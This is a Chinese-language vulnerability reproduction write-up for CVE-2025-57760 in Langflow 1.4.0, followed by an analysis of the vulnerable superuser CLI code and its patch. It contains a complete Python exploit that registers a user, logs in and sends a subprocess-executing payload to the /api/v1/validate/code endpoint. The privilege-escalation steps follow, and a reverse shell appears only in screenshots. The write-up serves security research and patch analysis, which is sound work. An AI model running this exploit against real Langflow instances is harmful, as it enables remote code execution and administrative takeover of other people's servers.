漏洞复现

docker启动

    docker run -it --rm \
      -p 7860:7860 \
      -e LANGFLOW_ENABLE_AUTH=True \
      -e LANGFLOW_SUPERUSER=admin \
      -e LANGFLOW_SUPERUSER_PASSWORD=123456 \
      -e LANGFLOW_AUTO_LOGIN=False \
      -e LANGFLOW_SECRET_KEY=secretK3Y \
      -e LANGFLOW_NEW_USER_IS_ACTIVE=True \
      langflowai/langflow:1.4.0

╭─────────────────────────────────────────────────────────────────────────╮
│                                                                         │
│  Welcome to Langflow                                                    │
│                                                                         │
│  🌟 GitHub: Star for updates → https://github.com/langflow-ai/langflow  │
│  💬 Discord: Join for support → https://discord.com/invite/EqksyE2EX9   │
│                                                                         │
│  We collect anonymous usage data to improve Langflow.                   │
│  To opt out, set: DO_NOT_TRACK=true in your environment.                │
│                                                                         │
│  🟢 Open Langflow → http://0.0.0.0:7860                                 │
│                                                                         │
╰─────────────────────────────────────────────────────────────────────────╯

注意开启LANGFLOW_ENABLE_AUTH启用认证,并且关闭自动登录,不然登录上去的就是superuser.

image-20250828112423578

注册低权限用户

启动docker后可以注册用户,先注册一个普通用户 testtest:123456

image-20250828112428905

image-20250828112434076

然后看登录的请求包

image-20250828112438925

image-20250828112444235

可以看到该用户并没有superuser的权限。

然后通过/api/v1/validate/code接口执行命令,这个接口是langflow的一个历史RCE漏洞,在langflow <1.3.0版本可以传入任意python代码,让其非授权执行并且没有沙箱限制,在1.3.0版本之后修复了未授权,但还是可以授权RCE。

### Code Execution Vulnerability (Fixed in 1.3.0)

Langflow allows users to define and run **custom code components** through endpoints like `/api/v1/validate/code`. In versions < 1.3.0, this endpoint did not enforce authentication or proper sandboxing, allowing **unauthenticated arbitrary code execution**.

This means an attacker could send malicious code to the endpoint and have it executed on the server—leading to full system compromise, including data theft, remote shell access, or lateral movement within the network.

To address, upgrade to >= 1.3.0.

所以在CVE-2025-57760中需要经过认证用户才能利用该接口实现RCE,进而利用CLI 命令进行权限提升。

{"code": "
def run(cd=exec('raise Exception(__import__("subprocess").check_output("{command}", shell=True))')): pass"}

RCE

写个exp,集成注册,登录和使用rce接口

import requests
import sys
import random
import string

def random_username(length=6):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def signup(base_url, username, password):
    url = f"{base_url}/api/v1/users/"
    payload = {"username": username, "password": password}
    r = requests.post(url, json=payload)
    print("[*] Signup:", r.status_code, r.text)
    return r

def login(base_url, username, password):
    url = f"{base_url}/api/v1/login"
    payload = {"username": username, "password": password}
    r = requests.post(url, data=payload)
    print("[*] Login:", r.status_code, r.text)
    data = r.json()
    access_token = data.get("access_token")
    cookies = r.cookies.get_dict()
    return access_token, cookies

def run_code(base_url, access_token, cookies, command):
    url = f"{base_url}/api/v1/validate/code"
    headers = {
        "Authorization": f"Bearer {access_token}",
        "Content-Type": "application/json"
    }
    code_payload = f"""
def run(cd=exec('raise Exception(__import__("subprocess").check_output("{command}", shell=True))')): pass
"""
    r = requests.post(url, headers=headers, cookies=cookies, json={"code": code_payload})
    print("[*] Validate:", r.status_code)
    print("[*] Response:", r.text)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <command>")
        sys.exit(1)

    command = sys.argv[1]
    base_url = "http://10.0.2.7:7860"
    username = random_username(6)
    password = "123456"

    print(f"[*] Using random username: {username}")
    signup(base_url, username, password)
    token, cookies = login(base_url, username, password)
    run_code(base_url, token, cookies, command)

然后反弹shell

image-20250828112453887

image-20250828112457639

权限提升

接下来就是CVE-2025-57760最重要的一环,也就是/app/.venv/bin/langflow superuser可以创建任意superuser用户,尽管的通过低权限用户拿到的shell。

image-20250828112501805

然后尝试使用新创建的用户zhangsan/zhangsan登录Web

image-20250828112505951拿下高权限用户。

分析

定位到superuser命令

@app.command()
def superuser(
    username: str = typer.Option(..., prompt=True, help="Username for the superuser."),
    password: str = typer.Option(..., prompt=True, hide_input=True, help="Password for the superuser."),
    log_level: str = typer.Option("error", help="Logging level.", envvar="LANGFLOW_LOG_LEVEL"),
) -> None:
    """Create a superuser."""
    configure(log_level=log_level)
    db_service = get_db_service()

    async def _create_superuser():
        await initialize_services()
        async with session_getter(db_service) as session:
            from langflow.services.auth.utils import create_super_user

            if await create_super_user(db=session, username=username, password=password):
                # Verify that the superuser was created
                from langflow.services.database.models.user.model import User

                stmt = select(User).where(User.username == username)
                user: User = (await session.exec(stmt)).first()
                if user is None or not user.is_superuser:
                    typer.echo("Superuser creation failed.")
                    return
                # Now create the first folder for the user
                result = await get_or_create_default_folder(session, user.id)
                if result:
                    typer.echo("Default folder created successfully.")
                else:
                    msg = "Could not create default folder."
                    raise RuntimeError(msg)
                typer.echo("Superuser created successfully.")

            else:
                typer.echo("Superuser creation failed.")

    asyncio.run(_create_superuser())

首先会调用create_super_user

async def create_super_user(
    username: str,
    password: str,
    db: AsyncSession,
) -> User:
    super_user = await get_user_by_username(db, username)

    if not super_user:
        super_user = User(
            username=username,
            password=get_password_hash(password),
            is_superuser=True,
            is_active=True,
            last_login_at=None,
        )

        db.add(super_user)
        await db.commit()
        await db.refresh(super_user)

    return super_user

可以看到从数据库获取user信息后,如果该用户不存在,则会创建一个该用户名的超级用户,然后调用 SQLAlchemy ORM的add进行添加,它的add实现是增添或者更新

def _save_or_update_impl(self, state: InstanceState[Any]) -> None:
    if state.key is None:
        self._save_impl(state)
    else:
        self._update_impl(state)

而这整个过程并没有进行权限校验,所以普通用户可以直接创建一个superuser甚至覆盖掉强制更新覆盖掉原来存在的用户

补丁

@app.command()
def superuser(
    username: str = typer.Option(
        None, help="Username for the superuser. Defaults to 'langflow' when AUTO_LOGIN is enabled."
    ),
    password: str = typer.Option(
        None, help="Password for the superuser. Defaults to 'langflow' when AUTO_LOGIN is enabled."
    ),
    log_level: str = typer.Option("error", help="Logging level.", envvar="LANGFLOW_LOG_LEVEL"),
    auth_token: str = typer.Option(
        None, help="Authentication token of existing superuser.", envvar="LANGFLOW_SUPERUSER_TOKEN"
    ),
) -> None:
    """Create a superuser.

    When AUTO_LOGIN is enabled, uses default credentials.
    In production mode, requires authentication.
    """
    configure(log_level=log_level)

    asyncio.run(_create_superuser(username, password, auth_token))

新版本之后创建superuser命令加了一个参数auth_token,这个参数默认为NULL并且可以从环境变量读取,然后调用_create_superuser

settings_service = get_settings_service()
# Check if superuser creation via CLI is enabled
if not settings_service.auth_settings.ENABLE_SUPERUSER_CLI:
    typer.echo("Error: Superuser creation via CLI is disabled.")
    typer.echo("Set LANGFLOW_ENABLE_SUPERUSER_CLI=true to enable this feature.")
    raise typer.Exit(1)

如果环境变量没有配置LANGFLOW_ENABLE_SUPERUSER_CLI=true则直接退出,不准创建超级用户

if settings_service.auth_settings.AUTO_LOGIN:
    # Force default credentials for AUTO_LOGIN mode
    username = DEFAULT_SUPERUSER
    password = DEFAULT_SUPERUSER_PASSWORD
else:
    # Production mode - prompt for credentials if not provided
    if not username:
        username = typer.prompt("Username")
    if not password:
        password = typer.prompt("Password", hide_input=True)

如果环境变量设置LANGFLOW_AUTO_LOGIN,则用户名和密码就是docker开启时候配置的SUPERUSER的用户名密码,因为如果开启了LANGFLOW_AUTO_LOGIN,用户没法登录,打开环境超级用户自动登录,所以默认拿到shell的用户是超级用户

如果没开启自动登录,用户名和密码由用户输入

from langflow.services.database.models.user.crud import get_all_superusers

existing_superusers = []
async with session_scope() as session:
    # Note that the default superuser is created by the initialize_services() function,
    # but leaving this check here in case we change that behavior
    existing_superusers = await get_all_superusers(session)
is_first_setup = len(existing_superusers) == 0

然后从数据库获取所有超级用户的列表

if settings_service.auth_settings.AUTO_LOGIN:
    if not is_first_setup:
        typer.echo("Error: Cannot create additional superusers when AUTO_LOGIN is enabled.")
        typer.echo("AUTO_LOGIN mode is for development with only the default superuser.")
        typer.echo("To create additional superusers:")
        typer.echo("1. Set LANGFLOW_AUTO_LOGIN=false")
        typer.echo("2. Run this command again with --auth-token")
        raise typer.Exit(1)

    typer.echo(f"AUTO_LOGIN enabled. Creating default superuser '{username}'...")
    typer.echo(f"Note: Default credentials are {DEFAULT_SUPERUSER}/{DEFAULT_SUPERUSER_PASSWORD}")
# AUTO_LOGIN is false - production mode
elif is_first_setup:
        typer.echo("No superusers found. Creating first superuser...")

如果当前超级用户数量为0,用环境变量里面的用户名和密码创建一个超级用户

如果已经是创建过超级用户之后并且开启了自动登录,则不准创建超级用户

else:
        # Authentication is required in production mode
        if not auth_token:
            typer.echo("Error: Creating a superuser requires authentication.")
            typer.echo("Please provide --auth-token with a valid superuser API key or JWT token.")
            typer.echo("To get a token, use: `uv run langflow api_key`")
            raise typer.Exit(1)

        # Validate the auth token
        try:
            auth_user = None
            async with session_scope() as session:
                # Try JWT first
                user = None
                try:
                    user = await get_current_user_by_jwt(auth_token, session)
                except (JWTError, HTTPException):
                    # Try API key
                    api_key_result = await check_key(session, auth_token)
                    if api_key_result and hasattr(api_key_result, "is_superuser"):
                        user = api_key_result
                auth_user = user

            if not auth_user or not auth_user.is_superuser:
                typer.echo(
                    "Error: Invalid token or insufficient privileges. Only superusers can create other superusers."
                )
                raise typer.Exit(1)
        except typer.Exit:
            raise  # Re-raise typer.Exit without wrapping
        except Exception as e:  # noqa: BLE001
            typer.echo(f"Error: Authentication failed - {e!s}")
            raise typer.Exit(1) from Non

如果没有开启自动登录,则需要提供一个--auth-token来创建超级用户

async def get_current_user_by_jwt(
    token: str,
    db: AsyncSession,
) -> User:
    settings_service = get_settings_service()

    if isinstance(token, Coroutine):
        token = await token

    secret_key = settings_service.auth_settings.SECRET_KEY.get_secret_value()
    if secret_key is None:
        logger.error("Secret key is not set in settings.")
        raise HTTPException(
            status_code=status.HTTP_401_UNAUTHORIZED,
            # Careful not to leak sensitive information
            detail="Authentication failure: Verify authentication settings.",
            headers={"WWW-Authenticate": "Bearer"},
        )

    try:
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            payload = jwt.decode(token, secret_key, algorithms=[settings_service.auth_settings.ALGORITHM])
        user_id: UUID = payload.get("sub")  # type: ignore[assignment]
        token_type: str = payload.get("type")  # type: ignore[assignment]
        if expires := payload.get("exp", None):
            expires_datetime = datetime.fromtimestamp(expires, timezone.utc)
            if datetime.now(timezone.utc) > expires_datetime:
                logger.info("Token expired for user")
                raise HTTPException(
                    status_code=status.HTTP_401_UNAUTHORIZED,
                    detail="Token has expired.",
                    headers={"WWW-Authenticate": "Bearer"},

首先把这个token当作jwt解码,可以看到jwt加密的密钥就是环境变量提供的LANGFLOW_SECRET_KEY,加密算法是HS256,解JWT得到user id再查数据库得到用户名。

解码失败就当作API Key去数据库查找,如果有is_superuser属性则认证成功,允许创建超级用户。

防御策略就是

1.开启LANGFLOW_AUTO_LOGIN之后不准使用superuser创建超级用户
2.关闭LANGFLOW_AUTO_LOGIN,则需要提供一个有效token来进行权限验证,认证通过则允许创建超级用户。

感觉密钥长度是一个安全隐患。